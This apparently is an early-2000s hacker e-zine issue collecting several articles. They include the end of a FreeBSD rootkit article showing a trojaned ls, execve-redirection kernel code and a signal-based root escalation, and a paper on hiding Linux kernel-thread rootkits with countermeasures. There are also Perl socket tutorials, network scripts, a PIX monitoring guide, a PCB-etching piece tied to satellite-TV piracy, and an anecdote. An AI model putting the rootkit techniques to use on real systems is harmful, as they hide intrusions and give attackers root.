hacker, i suggest to subscribe at freebsd-hackers@FreeBSD.ORG with
majordomo@freebsd.org, read any kernel papers on www.freebsdzine.org
(GREAT! :)
and read a lots of kernel code :)
-- H O W U S E M O Z A R E L A --
# ls -l
lrwxr-xr-x 1 root wheel 12 Jan 27 18:38 @ -> /usr/include
-rw-r--r-- 1 root wheel 157 Jan 26 16:24 Makefile
-rw-r--r-- 1 arkmp arkmp 6214 Jan 29 15:26 arkmp.kv11
-rw-r--r-- 1 root wheel 4447 Jan 27 21:32 mozarela.c
-rwxr-xr-x 1 root wheel 4937 Jan 27 21:32 mozarela.ko
-rwxr-xr-x 1 root wheel 24937 Jan 27 21:32 my_ls
# mkdir ARK
# mv my_ls ARK
# ln -s /dev/a /home/arkmp/keen/ARK/my_ls
# ls -l /dev/a
lrwxr-xr-x 1 root wheel 13 Jan 22 01:50 /dev/a ->
/home/arkmp/keen/ARK/my_ls
# kldload ./mozarela.ko
mozarela loadated
# ls -l
lrwxr-xr-x 1 root wheel 12 Jan 27 18:38 @ -> /usr/include
-rw-r--r-- 1 root wheel 157 Jan 26 16:24 Makefile
-rw-r--r-- 1 arkmp arkmp 6214 Jan 29 15:26 arkmp.kv11
-rw-r--r-- 1 root wheel 4447 Jan 27 21:32 mozarela.c
-rwxr-xr-x 1 root wheel 4937 Jan 27 21:32 mozarela.ko
(and ARK my dir isn't appears because my_ls trojan DON'T SHOW file/dir
with
ARK on name, and /bin/ls isn't modify, md5sum appears intact, but isn't
execute :)
# ps axu
[cut]
root 203 0.0 6.0 2092 1240 ?? Is 2:19PM 0:03.43 telnetd
arkmp 204 0.0 1.7 488 340 p0 Is 2:19PM 0:00.14 -csh (csh)
arkmp 251 0.0 6.6 1588 1368 p0 I+ 3:08PM 0:04.73 vi
arkmp.kv11
root 296 0.0 6.3 2092 1312 ?? Ss 4:11PM 0:00.24 telnetd
arkmp 297 0.0 1.7 488 356 p1 Is 4:11PM 0:00.13 -csh (csh)
root 314 0.0 1.7 480 348 p1 S 4:17PM 0:00.11 _su (csh)
root 0 0.0 0.0 0 0 ?? DLs 2:01PM 0:00.01 (swapper)
# cd \*CC
*CC: No such file or directory.
# kill -31 251
# ps axu | grep vi
root 251 0.0 6.6 1588 1368 p0 I+ 3:08PM 0:04.94 vi
arkmp.kv11
#
and my session has now uid/gid euid/egid 0 :)
why i use symbolic link ? because, for make more little kld my function
for
redire execve contains the follow code:
static struct couple execred[3] =
{
{ "/bin/ls","/dev/a" },
{ "/bin/su","/dev/b" },
{ "/bin/rm","/dev/c" }
};
int size =sizeof(execred) / sizeof(struct couple);
while(size >= 0)
{
if(!strcmp(execred[--size].oldexec, uap->fname))
{
memcpy(uap->fname, &execred[size].newexec,
sizeof(execred[size].newexec));
uap->fname[sizeof(execred[size].newexec)+1]=0;
}
}
you may see that if the second name is more bigger than first name, the
function:
memcpy(uap->fname, &execred[size].newexec, sizeof(execred[size].newexec));
can overflow uap->fname buffer.
put a symlink isn't a big problem with a trojan ls you may hide it on 3
seconds
the Makefile:
------------------------------------------------- cut here -----------
SRCS = mozarela.c
KMOD = mozarela
KO = mozarela.ko
KLDMOD = t
KERN = /usr/src/sys/kern
.include <bsd.kmod.mk>
------------------------------------------------- cut here -----------
any kld could have a lots of implentation, i can't discute here, there are
a lots of example on the linux/freebsd/solaris kernel programming
tutorials
from THC group and a lots of example and study from s0ftpj group.
-- L A S T W O R D A B O U T I N F I N I T E W A R --
crackers create rootkit,
security man create md5sum
crackers create execve redirection
security man create securelevel and syscall ripristination
the securelevel maybe explained on various man pages on freebsd, syscall
ripristination is explained on paper of Pragmatic,
syscall ripristination IMHO can be fucked with monitoring of kldload() and
kldfind() for DROP any module loaded after mozarela or some other trojan
on the kernel (not on other linked file!) securelevel can be fucked with
a spapem packages coded by vecna (you may find info about on the README
file
on http://www.s0ftpj.org/tools/spapem.tar.gz)
that's all, for this time :)
[A Newbies Guide To Sockets in PERL]===================================[Beowulf]
Some of this was taken from "PERL in a nutshell" by Oriely.
(and then modified by me)
I'm assuming you have programed in PERL before or maybe just a little bit
because this is not a newbies guide to PERL but to sockets in PERL. So a
small background in the language would be nice. This paper will contain
a quick introduction to sockets, programing only the client side.
(Because im too lazy to do server side) If you really want to make it
easy, using the IO::Socket module, at the end will be a quick little
script that tests ports to see if they are open from the client side.
Feel free to modify it because its pretty lazy coding, but it was late
and I didnt have a lot of time so change it.
Anyways if you have any questions, email me at chixdigUNIX@the-pentagon.com
or talk to me on irc undernet under the name beowulf.
On with the tutorial!
First off you need to know what a socket does...
I took this definition right from one of oriely's book so dont get mad
at me if you dont like it...
"Sockets are the underlying mechanism for networking on
the Internet. With sockets, one application (a server) sits on a port
waiting for connections. Another application (the client) connects to that
port and says hello; then the client and server have a chat. Their actual
conversation is done with whatever protocol they choose - for example,
a web client and server would use HTTP, an email server would use
POP3 and SMTP, etc. But at the most basic level, you might say that
all network programming comes down to opening a socket,
reading and writing data, and closing the socket again. Sockets provide
a connection between systems or applications.
They can be set up to handle streaming data or discrete data packets.
Streaming data continually comes and goes over a connection. A
transport protocol like TCP (Transmission Control Protocol) is used
to process streaming data so that all of the data is properly received
and ordered. Packet-oriented communication sends data across the network
in discrete chunks. The message-oriented protocol UDP
(User Datagram Protocol) works on this type of connection.
Although streaming sockets using TCP are widely used for applications,
UDP sockets also have their uses. Sockets exist in one of two
address domains: the Internet domain and the Unix domain. Sockets
that are used for Internet connections require the careful binding and
assignment of the proper type of address dictated by the Internet Protocol
(IP). These sockets are referred to as Internet-domain sockets.
Sockets in the Unix domain create connections between applications
either on the same machine or within a LAN. The addressing scheme is less
complicated, often just providing the name of the target process."
Socket Functions in PERL
socket - Set up a socket and assign a filehandle to it
connect - Client side only: you guessed it it connects to a socket
recv - Reads data from a filehandle
send - Writes data to a filehandle
shutdown - Terminates a connection
How to set up a socket:
You need several arguments before you can set up a socket such as...
either PF_INET if you want to connect to a internet address or PF_UNIX
if you are connecting to a UNIX domain address. Next you need to set up
the argument for what type of connection you want to establish. If you
want to have a packet-based UDP connection you would use SOCK_DGRAM, or if
you want a streaming TCP connection you would use SOCK_STREAM, The next
argument would be the protocol you want to use for the connection, you
would use getprotobyname for this.. And for the last argument your going
to want that handy die command with the error variable $!. So lets look
at a typical way to set up a socket...
use Socket;
socket (BLAH, PF_UNIX, SOCK_STREAM, getprotobyname('tcp')) || die $!;
Ok lets take a look at the arguments used...The BLAH would be the
sockets filehandle. The PF_UNIX would set up sockets
for a Unix domain address, the SOCK_STREAM would specify the streaming
TCP connection, the getprotobyname sets the protocol to be TCP and
then, of course, you have the die command.
Client Side Programing:
For a client side program after you set up the socket you need to connect
to a specific port with the connect command. Again you need arguments the first
being the socket filehandle and the second being the data structure.
You will also need either the sockaddr_un for Unix domain addresses and
sockaddr_in function for internet addresses.
If you want to use sockaddr_in you need more arguments, the first is the
port number, the second is a ip address or a URL.
So lets say you want to connect to port 21 on the server blah.com it would look something like this:
my $variable = sockaddr_in (21, inet_aton('blah.com'));
connect (KFL, $variable) || die $!;
If it does connect it will return a true value (i.e. 1)if it doesnt it
will display the error message with the $! variable.
If it does connect you can do a number of things such as the send command
which sends data to the host or the recv command to read incoming data on the
socket. After you are done using the socket you'll want to shut it down
with the close or shutdown command.
The IO::socket module:
The IO::socket module is included in the core of perl and it makes life
easier for all you lazy programers.
Instead of using the above method, using this module makes it more object
oriented. Here is an example on how to set up a socket:
use IO::Socket;
$blah = new IO::Socket::INET (PeerAddr => 'X.X.X.X',
PeerPort => 23,
Proto => 'tcp');
die "$!" unless $blah
Ok you can pretty much figure it out yourself where X.X.X.X is the ip or
host name of the server. PeerPort is obviously the port you want to connect
to and the proto is the protocol you want to use. There are other functions
of the IO::socket module but im too lazy to write them all out you can get
more info on them at cpan.org
Example of a badly written program without using the IO::socket module
to test ports:
#!/usr/bin/perl
use Socket;
socket (BLAH, PF_INET, SOCK_STREAM, getprotobyname('tcp')) || die $!;
print "Please enter the host you want to test\n";
chomp($host = <STDIN>);
print "please enter a port\n";
chomp($port = <STDIN>);
my $blah = sockaddr_in ($port, inet_aton("$host"));
connect (BLAH, $blah) || die $!;
if ($blah) {
print "Port found\n";
}
else {
print "Port not found for reason... $!\n";
}
ok and now for one with the IO::socket module:
#!/usr/bin/perl
use IO::Socket;
print "Please enter the host you want to test\n";
chomp($host = <STDIN>);
print "please enter a port\n";
chomp($port = <STDIN>);
$blah = new IO::Socket::INET (PeerAddr => "$host",
PeerPort => $port,
Proto => 'tcp');
if ($blah) {
print "Port found\n";
}
else {
print "Port not found for reason... $!\n";
}
Ok well thats it for the time being if this makes it into KV then
I will write up another paper this time on the server side.
Hi to everyone i know on irc later for now, beowulf
[Curiosity killed the American Citizen]===============================[Firewa11]
The secret military. The nifty spy cameras. The homing devices. Big brother
looking down on us from above. The entire program waiting to crush you the
moment you might uncover the truth to any of their lies. Seems like just a good
movie you caught the other day right? You've always known such a program exists
but you've never seen it for yourself. Well, I have. Here's what happened:
I'm a curious, inquisitive person. I'm an engineer by career and an engineer by
home. I like to know how things work. A conversation with Digi sparked an
interest in missile silos. I looked at the ones for sale, which prompted me to
look at all abandoned missile silos.
So, I started looking at all of the abandoned silos from where I grew up. Wow,
I only knew of the ones over by the lake, never anywhere else. There were a
lot of them. So, as I'm scoping it out, I find a site that appears to be in
really good shape. Great. I can contact the owner of the land, and perhaps he
will let me on the site to take pictures. Maybe if it hasn't been sealed in, I
can go down inside. Cool!
As I'm playing around on Terraserver, I'm looking at all of the stuff around
the area, and happened to come across something familiar. It's a site that
looks identical to the silos out by the lake, except this one isn't grown over,
and appears to have not been dismantled. Funny, it's not in my list of former
or current sites. Curiosity kicks into overdrive.
So, I go hang out with my parents for a day, and decide on my way home I'm
going to swing by those sites and see what I can see. The 'reality' voice in
my head is telling me that all is going to happen is I'm going to meet locked
gates, nothing to see, and a waste of gas. Ok, sure. At least my curiosity
will have been calmed.
First site. It's the old one. The one that I have listed as abandoned. Yup,
the gate is locked and has a "Posted: No trespassing" sign in plain view. I
can see that the road is all but grown over, and trees have started to grow up
through the concrete on the pad. Definately not in working order. Ok, time
to head back to the other site, and take a look.
Second site. This is the newer looking one. From my outdated pictures on
terraserver, it looks to be a well-kept location, with structures that are
usually removed as soon as a site is decommissioned. Interesting. Anyways, I
pull up to the gate, roll down my window, and start taking pictures with my
good SLR camera. I don't want to switch lenses, but I can't quite make out
what the signs say, so I get out of the truck and go up to the gate and start
taking shots of the signs.
The first sign says "Posted: No trespassing", and the other I couldn't quite
remember, but listed stuff like an oil lease. Nowhere did it say anything
about a military installation or the like. The signs were crudely fastened to
an old chainlink fence that surrounded the entire facility. As I turn to
leave, I hear a man ask what I was doing.
I turned to look, and the man was dressed in a pair of blue-jeans and his
shirt was a faded long-sleeve cowboy style shirt. He had overgrown long hair
and his smile suggested many years without a toothbrush. He looked to be in
his 30s. Anyways, I told him I was doing some research on abandoned missile
silos in the area and came across this site. He asked if I wanted to come in
take a look around, and of course I said yes. I ran back to my truck and
grabbed another roll of film and put it in my pocket, then followed him
through the now open gate.
To the left is the old abandoned gatehouse. It looks rusted down, and is
missing a door. Looks like some old cardboard boxes inside. Up ahead to the
left is an old house. Looks like it's been there quite awhile. Basketball
goal in front of the driveway, and a bunch of kids toys lying on the ground.
About 10 ft from the gate, as we're walking into the facility, out of nowhere
and without sound, someone grabs me from behind. At this point I'm wondering
"what the fuck?", so as I get spun around I see a man in camo reaching for my
camera, so instinctively I hold it away. WHAM! I get knocked in the gut,
and my arms fold to protect my stomach and the camera is pulled from my hands.
The soldier, whos name I did mention to grab, proceeds to open up my camera
and pull the film from it tearing it roughly out. As I finally catch my
breath from having the wind knocked out of me, he throws the camera to me,
which ends up falling down and landing on my feet. Then he tells me to "Get
in your truck and get gone". Which I comply with, no questions asked. As
he turns to leave I see the matte black M-16 strapped over his shoulder, and
the civilian guy glare at me as he too turns and walks up to the house.
I throw my camera and the now-destroyed roll of film in the side seat and
took off. My hands were shaking so badly I couldn't even dial a number on my
cell phone, so I proceeded to chain smoke all the way back into town. After
about a pack of smokes and mountain dew, I was good to go. I called and
talked with Digi, as well as others.
Reflections....
Ok, if something wanted to remain completely secret, they would have not come
out and opened the gate. With a closed gate and a normal enough looking
house, it could have been dismissed and I would have went home. However, in
a given year, how many people actually come out and photograph gates of
places they find on Terraserver? Maybe these guys didn't know how to react.
Or maybe they did. Heh. Such possibilities there are when dealing with the
unknown. So my safest bet at this point is to file an official complaint
with the base commander for assault on a civilian. If that gets me nowhere,
then I'm not going to press further. I mean, I *could* call the cops, I
could write my congressman, I could jump up and down and scream bloody mary,
but all that is going to do is cause me to get buried.
So, I release this information to those whos conviction will be strengthed
by it. We all know these places exist. The signs are all around us. But
until we are staring down the barrel of a few assault rifles to we realize
the real face behind the machine.
[Microsoft's OpenSource Policy]===============================[Elite Secret Spy]
Editor's Note: One of our elite security spies pulled this out of microsoft
way back in January, but since we aren't as fast as we used to be, it's just
now making it in. Don't know if this has been published or not, don't care.
PROPER USE OF OPEN SOURCE SOFTWARE AT MICROSOFT
OSS includes a wide range of products distributed under a variety of
licenses such as the General Public License (GPL), Lesser General Public
License (LGPL), and Berkeley Software Distribution (BSD) license. If you
are uncertain whether software you intend to use is considered
“open source”, or the license you plan to use will result in
the software being treated as OSS, please check with the Microsoft
Manager to whom you are assigned.
Microsoft's goal with respect to the treatment of OSS is to avoid
inadvertently contributing our intellectual property to an open source
effort. The rules below are intended to protect valuable Microsoft
intellectual property and MUST be followed:
1. Do not incorporate OSS into MS products.
2. Do not contribute code to an open source project.
3. Do not review, modify or distribute OSS source code.
4. Other than OSS source code, it is okay to review other information
about open source projects (e.g., architecture descriptions included in
books, project descriptions provided at websites, development discussions
conducted on the Internet, etc.), provided that you comply with any
accompanying licenses or restrictions. If you have questions about the
rules governing access to specific information, check with your Microsoft
Manager to whom you are assigned.
5. You may run an OSS executable that is subject to the GNU General
Public License (GPL) or any similar agreement, so long as the license or
agreement does not require you to accept additional restrictions and/or
obligations as a condition of running the software. If you have questions
or concerns regarding the terms of a particular license or agreement,
check with your Microsoft Manager to whom you are assigned.
6. For code that is developed, or otherwise owned by or licensed to MS,
do not distribute or otherwise make the code available under an
“open source” agreement
These rules apply to all activities related to the business of Microsoft,
regardless of the time or location of such activities. At times, you and
the Microsoft Manager to whom you are assigned may reach the preliminary
conclusion that there is a sound business reason for taking an action
that is otherwise prohibited by the above general rules. In that event,
the Microsoft Manager will check with their LCA contact who will assess
any legal risks associated with the action and advise on the steps the
Microsoft Manager needs to take to obtain executive approval for the
action. An executive approval must be in place in order to deviate from
the above rules. <?XML:NAMESPACE PREFIX = O />
If you have any questions or concerns regarding Microsoft’s Open
Source Software (OSS) guidelines please contact the Microsoft Manager to
whom you are assigned or your agency or vendor employer contact.
[PERL Headache of the Issue]=====================================[Digital Ebola]
This issues headache was provided by mercs. He wanted to take two lists
compare them, take the differences, and compile them into a third, unique
list. Sounds quite easy, cause it's PERL, right? Not quite as such, there
are no facilities to compare arrays (well no EASY facilities). And true
to Larry's word, there was certainly more then one way to do it. Thanks
to those that helped, for helping me find a better way to do it, then my
original method. (Side note, mine was from PERL FAQ4, and the solution was
ugly)
#!/usr/bin/perl
#comp.pl - compares two lists, and combines them into a third unique
#list with no matching elements. Written for mercs, by Digital Ebola.
#Much thanks to super, who helped out with the array comparisons.
#Digital Ebola <digiebola@hackphreak.org> - 5/11/2001
my ($file1, $file2, $file3) = @ARGV;
if (! @ARGV) {
die "Usage: comp.pl listfile listfile completelist\n";
}
open(FILE1,$file1) or die "Can't open $file1: $!\n";
open(FILE2,$file2) or die "Can't open $file2: $!\n";
open(FILE3, ">$file3");
@list1=<FILE1>;
@list2=<FILE2>;
print FILE3 @list2;
for(my$i=0;$i<@list1;$i++) {
print FILE3$list1[$i]if$list1[$i]ne$list2[$i];
}
[Fun with XOSD]==================================================[Digital Ebola]
/* xosd-tail.c by Digital Ebola <digiebola@hackphreak.org> */
/* You must have xosd for this to work, get it at www.freshmeat.net */
/* Greets to vac, teeceep, and super */
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include "xosd.h"
#define FONa "fixed"
int main(void)
{
FILE *unf;
char ack[170];
xosd *osd;
osd = xosd_init (FONT, "LawnGreen", 3, XOSD_top, 0);
if((unf = fopen("syslog", "r"))!=NULL) {
while(fgets(ack,sizeof(ack),unf)!=NULL) {
xosd_display (osd, 0, XOSD_string, ack);
sleep(5);
}
}
xosd_uninit(osd);
fclose(unf);
return EXIT_SUCCESS;
}
[More PERL Madness]==============================================[Digital Ebola]
#!/usr/bin/perl
#GetHostByEverything by Digital Ebola <digi@legions.org>
use Socket;
for($a=4;$a < 255;$a++) {
for($b=1;$b < 255;$b++) {
for($c=1;$c < 255;$c++) {
for($d=1;$d < 255;$d++) {
$iaddr = inet_aton("$a.$b.$c.$d");
$name = gethostbyaddr($iaddr, AF_INET);
$straddr = inet_ntoa($iaddr);
#I'm lazy, shuddap.
system("/bin/echo $name >> report.txt");
print("\n$name\n");
system("/bin/echo $straddr >> report.txt");
print("$straddr\n");
system("/bin/echo ------------------------- >> report.txt");
print("-------------------------\n");
}
}
}
}
[CISCO PIX Connection Monitoring]====================================[DataShark]
I started this project because the PIX family of firewalls can handle a
?limited? amount of concurrent connections and it was causing problems
for us. My basic goal was to create a application to monitor PIX
connections. I found that it was easier to do with MRTG then to create a
stand alone application, so I set off into shell script land.
My first challenge was to find the OID that stored the current connections
to the PIX. After much searching and beating my head on my desk I was able
to find it.
CURCON=`/bin/snmpwalk -m ALL <IP OF PIX> "<SNMP COMMUNITY STRING>" .1.3.6.1.4.1.9.9.147.1.2.2.2.1.5 | grep -v End | grep -v 'enterprises.9.9.147.1.2.2.2.1.5.40.7' | awk -f /usr/local/mrtg-2/bin/proxy.awk`
HICON=`/bin/snmpwalk -m ALL <IP OF PIX> "<SNMP COMMUNITY STRING>" .1.3.6.1.4.1.9.9.147.1.2.2.2.1.5 | grep -v End | grep -v 'enterprises.9.9.147.1.2.2.2.1.5.40.6' | awk -f /usr/local/mrtg-2/bin/proxy.awk`
echo $CURCON
echo $HICON
echo '[unknown]'
echo pix
Ok lets look at the script:
Line one the CURCON line (forgive word wrap) I use snmpwalk to gather the
correct information the ?.1.3.6.1.4.1.9.9.147.1.2.2.2.1.5? OID returns two
values so I remove the one I do not need and feed the entire thing to awk.
Line two is the same as line one except I am drawing out the high connections.
Then I format it MRTG accepts its input in 4 lines:
Line one is the ?bytes sent? or in our case the current connections.
Line two is the ?bytes received? for us its high connections.
Line three is the uptime of the unit. If anyone wants to take the time to find
the uptime OID on the PIX please send it to me. :>
Line four is the name of the device being polled.
Next up the MRTG configuration:
This is pretty much your standard MRTG config file:
Title[^]: Response times for
ShortLegend[_]: count
Legend1[_]:
Legend2[_]:
Legend3[_]:
Legend4[_]:
LegendI[_]:
LegendO[_]:
YLegend[_]: Count
Options[_]: noo, gauge, growright, nopercent
MaxBytes[_]: 15000
ImageDir: /var/www/html/mrtg
LogDir: /var/www/html/mrtg/logs
HtmlDir: /var/www/html/mrtg
Refresh: 300
Interval: 5
RunAsDaemon: Yes
Target[pixconn]: `/usr/local/mrtg-2/bin/pix.sh`
MaxBytes[pixconn]: 1000000
Options[pixconn]: noo, gauge, growright, nopercent
Colours[pixconn]: PURPLE#660066,BLACK#000000,RED#cc0000,RED#cc0000
Title[pixconn]: Pix Concurrent Connections
PageTop[pixconn]: <H1>PIX Concurrent Connections</H1>
<TABLE>
<TR><TD>System:</TD> <TD>PIX</TD></TR>
<TR><TD>Description:</TD><TD>PIX 515UR - Concurrent Connections</TD></TR>
<TR><TD>Ip:</TD> <TD>10.2.1.1</TD></TR>
</TABLE>
The only exceptions being the ?Target? line is the name of the shell script we
just talked about. The other if the options line We have the ?noo? option
that tells it not to graph the second line of the output from our script and
the gauge option that tells it to treat the numbers as what they are and not
incrementing counters.
Look for a new version for RRDtool and some more trick cisco stuff as I get
more time. Please submit requests, fixes, comments etc..
to crice@180096hotel.com.
/* For the html version of this article http://www.hcity.net/~nomad/pix.html */
[Poor Man's Boards]==================================================[BigGeezer]
I dont know if yall have heard about the DirectTV stuff that has been
going on. Well.. Short and Sweet. People have been hacking the DirectTV
H-card for sometime now. They were finally able to stop the hacking about
3 months ago. A few people, use emulators to get free tv.. Circut
Boards that plug into a computer and into the DSS irda to get a
signal.. (These arent blocked by the way so if you use emulators.. you
still get free TV) It takes making 2 circuit boards.
So I headed to the local Radio Shack and found out that it cost quite a
bit of money to make your own boards. That just wasnt going to do. So
after some investigation, and talking to a very *SMART* Electronics
Engineer, I found out how to do it cheeper.. and have the equipment to
make circut boards for anything. I'm not talking about the pref boards
from radio shack.. I am talking printed circut boards.. just like you see
in all electrical devices. The focus of this article is Home Made Printed
Circut Boards.
The first thing you need, is supplies... I know what your thinking.. "Here
comes the expensive part". Your right. But.. if you think a total
investment of $40 dollars, is expensive, you really should find another
hobby anyways. Here we go.. the list:
1. Bubble Stone (the same size of CD cases. They are long and blue). You
can find these at pet stores, in the aquatics section.
2. 2 Empty CD cases
3. Air Pump (the same kind for a fish aquarium) bought from a fish store.
4. Tubing.. (Should come with the air pump)
5. Access to a laser printer.
6. Labels.. (you need the backing)
7. Mutriatic Acid (spelling..?) bought at any swimming pool store.. or
home depot.
8. Hydrogen Peroxide. bought at walmart for 87c for 1/4 gallon.
9. Copper clad board. Found at any electronic shop.
10. Silicone (Found at walmart auto parts)
11. A hot plate. (the electrical kind or a skillet would do as well)
12. Finger Nail Polish remover (or acetone)
Putting it together.
1. Take the bubble stone with the 2 cd cases split apart.
2. Connect the cd cases around the bubble stone with silicone.. around the
part that produces the bubbles.
3. Take the air pump and connect it to the bubble stone. There you
go.. you haveB your burner made.. simple wasnt it..?
Making the Circut Boards.
Ok.. you have your diagram of the Circuit, print it out on the laser
printer. On that copy, take the back of the label, clean it with the
Finger Nail Polish remover, and tape it to the printed part and reprint it
again, so the image is on the slick part. Now..put that aside for a
bit. Turn your hot plate or skillet on, you can tell it is hot enough if
you spray some water on it and the water beads up. Now tape the slick
image printed part down on to the copper clad board.
Put the copper clad board on the hot plate.. and with a towel or pot
holder layed on top.. with a piece of wood on top of that, and press down
for about 30 seconds. After the 30 seconds, remove the board from the hot
surface and lay it aside for a few mins to cool down. Once it is cooled
down, remove the paper. It will leave a perfect image of the circut on the
copper clad board.
Now the Burning process.
Fill your burner with half and half Mutraitic Acid and peroxide. Turn
your pump on so it is producing bubbles. Put the copper Clad board inside
and watch the wonder of acid. As you are watching.. it will remove the
copper around where the circuit was printed, but will leave the printed
part alone. After about 3 or 5 minutes, the solution will turn green from
the melted copper and you can see it is almost done. Once it is
done, remove the board and rinse it off under the sink. WHAMO! You have
yourself a nice printed circuit board. Just drill your holes where you
want your connections and solder.
I have been using this alot lately making chip programmers.. eeprom
burners, servo boards, etc. I am in the process of making a frequency
counter to use as a bug detector.. hehe.. I will be taking pictures of how
I did this.. and posting them.. I will get Digi to put the URL up on his
site, as soon as I get them done.
[YAPOTTLK]=============================================================[Lawless]
Yet another Paper on Trojening the Linux Kernel
Typically when one thinks about kernel rootkits on linux, the subject of
system call remapping comes up. This technique is tried and true; however,
it is also quite easy to detect. Currently available are several
utilities, including lomac and my StMichael LKM to handle these attacks.
Moving beyond the simple systemcall remapping, there has been information
published about actually rewriting some functions during the kernel
runtime. Again, this can be detected easily by monitoring the values of
the functions via a checksumming mechanism. Again, an example of such
attacks on these attacks is available in StMichael_LKM-0.04.
So, where to next? One area that has not been explored is the application
of kernel threads in the production of a kernel rootkit. Although one
would not have the easy access that systemcalls provide, since the kenrel
threads are running in kernel space -- one can intercept, replace, or
alter system activity in ways that are undetectable.
But, for just a moment let me digress.
+Kernel Threads+
----------------
The concept of kernel threads is nothing new. A kernel thread is, for most
purposes, no different then a regular user-land process with three
exceptions:
-- Each Kernel thread executes a single specific kernel function. This
is in contrast to regular executable kernel functions accessible
via events such as a system-call.
-- Kenrel threads run only in kernel-mode, while regular processes
run either in user-mode or kernel-mode (via systemcalls)
-- Kernel threads are only use linear addresses greater then
PAGE_OFFSET (defined in .h), due to the fact they run only in
kernel mode.
Source: Understanding the Linux Kernel, p94. ISBN: 0-596-00002-2
As mentioned, the kernel threads are simply defined functions within
the kernel, that are passed to the kenrel_thread() call and daemonized.
Kernel threads acquire their run time via the scheduler, and have a
execution priority associated with them. One benefit of the
kernel-threads is that since they are already in kernel-space, the
latency associated with performing systemcalls is removed. This is, in
part, the justification that was used for the implementation of the kernel
httpd kernel thread.
+Kernel Threads containing Hostile Code+
----------------------------------------
So, how could a dubious individual utilize this feature of the linux
kernel to implement hostile or subversive code on a system? A couple ways
come to mind:
-- Back-Orafice for Linux (Or some simular linux-based
remote-administration *wink* tool.
-- Attack-Concealment (Hiding Files, Connections, Processes, etc).
To implement these features, we will look at how the kenrel threads could
access the network overtly or covertly, modify or intercept filesystem
calls. Other items that could be done is to actually modify the memory
management to selectively load certain memory pages in depending on some
circumstance -- ie, think double books.
+Kernel Threads And Overt Network Access+
-----------------------------------------
As a process, the kernel threads have a context. That permits them to
easily possess open file descriptors and network sockets. Because of this,
writing a specific kernel_therad that would accept connections, or write
data to a network socket (via the appropriate system calls) can be done
from within kernel space.
The only challenge that would have to be handled by the developer of a
kernel thread requiring overt network access is working without the
comfort of the network libraries. Sure, one could probably statically link
the libraries to the module -- but its a waste of space. Moreover, it take
the fun out of writing a kernel thread. Ever hear of roughing it?
All of the network functions that could be used, with the exception of
data manipulation functions (ie, htol), eventually perform a system call.
Guess what? The kernel thread executes in kernel context! That means that
the kernel thread could simply call the system call directly.
For example, to call, say write to a connected socket's file descriptor
(say fd 10) the buffer "Hello World", one would use:
ret_val = (*sys_call_table[__NR_write])(10,"Hello World",12);
+Kernel Threads And Covert Network Access+
------------------------------------------
Well, that's all fine and dandy. However, if the kernel_tread is truly
hostile it probably shouldn't have open network sockets just lying around.
Perhaps they could be hidden, but why even bother?
Once again, the kernel_thread is executing in kernel context. That means
it can see the incoming and outgoing network traffic as it is stored in the
individual sk_buff lists, accessible from the skb_head_pool.
Reference: linux/net/core/skbuff.c
By monitoring established network connections for to read data, or using
established network connections to transmit data to connected, the
activities of the kernel_thread can be concealed from the system, and
specially crafted communications utilities can user innocuous services
that legitimately operate on the victim host, such as httpd or sendmail,
to manage the network connections by which commands and responses would be
transmitted from a controlling remote host and the victim host.
+Kernel Threads and File-system Access+
--------------------------------------
In UNIX, everything is represented on the fileystem. System memory,
itself, exists as a file, /dev/kmem. Without touching system call tables,
how can one control the actual filesystem activity?
In Linux, all the filesystems are abstracted under a virtual filesystem
layer. Associated with each instance of a filesystem on a device
is a operations structure, which maps the real file-system
operations to the VFS layer.
In the case of ext2fs, the ops table is defined in linux/fs/ext2/super.c
and is called ext2_sops.
An attacker wishing to manipulate this structure has two options:
1. Rewrite the structure with the tronned operations.
2. Seek out all superblocks, and currently open file descriptors
replacing the ops pointer with a address of the tronned
operations residing in the kernel_thread.
The first option is the easiest to implement, the trojaned structure
is simply copied over the original structure. No further changes
are necessary. If the structure is being monitored via a checksumming
mechanism, it will be identified as changed (as a static structure this
is definitely a sign that something is afoot). The risk of this occurring
is mitigated by the fact that the ext2_sops structure is not an exported
symbol, and is not easily monitored.
The second option is be harder to detect, but would requires
more work to implement. First, each mounted filesystem would have
to have its in-memory copy of its superblock modified to reference
the trojaned operations structure. Secondly, all currently open
files on those filesystems would have to be modified, as they copy
the ops pointer from their superblock upon creation of the file
descriptor.
+Kernel Thread Concealment+
---------------------------
What good is a kernel thread to do all the nice and naughty things
in the world if it stands out like a sore thumb. I mean, part
of the reason for looking at this is to hide ones presence. Then
why would one be content having a kernel thread appear as:
root 9 0.0 0.1 1368 72 ? S Jul14 0:12 [ur0wn3d]
OK, maybe that is a little bit over the top, but you get the point.
Again, a simple solutions:
Remember that filesystem stuff? Yep, proc file system too.
One word: proc_sops
+Detection and Countermeasures+
-------------------------------
So, faced with this type of mechinism that can conceal attacks
and be used as a remote administration tool for linux systems,
how do we protect ourselves?
1. Disabling the kenrel_thread call is insufficient. Even if
the call is disabled on a system after the necessary
kernel threads are started, then one can use their time
during init_module to 'roll their own' kernel thread call.
2. Checksumming various common and critical filesystem,
memory management, and scheduling data structures would
prevent a kernel thread from using its position to subvert
the low level memory management, filesystem, and scheduling
code.
This does not detect or prevent other mallicious effects that
could be done by the kernel thread.
3. In StJude, tie kernel threads to the default (no privlage)
rule. kernel threads can be identified by abnormalities
in their task_struct, so this is possible. It would limit
the use of kernel threads as remote administration tools.
This is just a brief summery of possible countermeasures. Others
may follow. Despite this, the kernel threads provide an elegent
and dangerous mechinism for the implementation of hostile code
within the linux kernel.
[I Got Windows, Now What?]==============================================[Ntwak0]
>------------------------------------------------------------------------------<
OOO OOOO O OOOOOO OOOOOO OOOO OOOOO OOOOO
OOOO OOOO O OOOOOO OOOOOO OOOO OOOOO OO OO
OOO OO OOOOOOOO OO OO OO OOOOOO OO OOO O O
O OO OO O OO OOO OO OO OOO OOOOO O O
O OO OO O OO OOO OO OOOOOOO OOOOOO O O
O OOOO O OOO OOO OOO OO OO OO OO OO
O OOO OO OOO OOO OOO OO OOO OO OO OOO OOO
OOOO OOO OOOOOO OO OO OOOOOOOO OOOO OOO OOOOO
>------------------------------------------------------------------------------<
>-----------------------------------------<
| * 1- I got Ne / 2K Now What ? |
| * 2- Who Should Read This ? |
| * 3- What does it Cover ? |
| * 4- After you install NT Do this ? |
| * 5- NT HotFixes By File Version ? |
| * 6- After you install NT HotFixes ? |
| * 7- Next KV will Cover The Registry |
>-----------------------------------------<
>------------------------------------------------------------------------------<
>------------------------------<
>---I got NT / 2K Now What ?---<
>------------------------------<
As you may know NT and 2K default install is not the FULL secure install.
